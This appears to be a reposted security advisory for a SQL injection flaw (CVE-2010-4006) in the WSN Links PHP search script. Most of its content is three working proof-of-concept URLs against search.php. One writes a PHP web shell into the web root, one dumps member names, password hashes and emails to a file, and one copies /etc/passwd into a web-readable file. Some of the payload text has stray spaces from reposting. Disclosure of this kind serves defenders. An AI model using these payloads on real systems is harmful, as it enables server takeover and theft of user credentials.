WSN Links SQL injection vulnerability-vulnerability warning-the black bar safety net

WSN Links is an advanced PHP-based/MySQL search script, WSN Links < 6.0.1,< 5.1.51;, < 5.0.81 version of the search. php file existsSQL injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info:

'WSN Links' SQL Injection Vulnerability (CVE-2 0 1 0-4 0 0 6) 
Mark Stanislav - mark.stanislav@gmail.com 

[+]poc: 

1. A ‘UNION SELECT’ which results in a PHP shell-execution script
   http://example.com/search.php?namecondition=IS NULL))%20UNION%2 0((SELECT%2 0"<? php%20system($_REQUEST[cmd]);%2 0?& gt;"%20INTO%20OUTFILE&namesearch=/var/www/exec. php&action=filter&filled=1&whichtype=categories

2. A ‘UNION SELECT’ which results in a member’s name, password hash, and e-mail to be extracted to a file
   http://example.com/search.php?namecondition=IS NOT NULL))%20UNION%2 0((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass. txt&action=filter&filled=1&whichtype=categories

3. A ‘UNION SELECT’ which results in the /etc/passwd file being copied to a web directory file
   http://example.com/search.php?namecondition=IS NOT NULL))%20UNION%2 0((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd. txt&action=filter&filled=1&whichtype=categories

[+]Reference:

http://www.wsnlinks.com/ 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006 
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/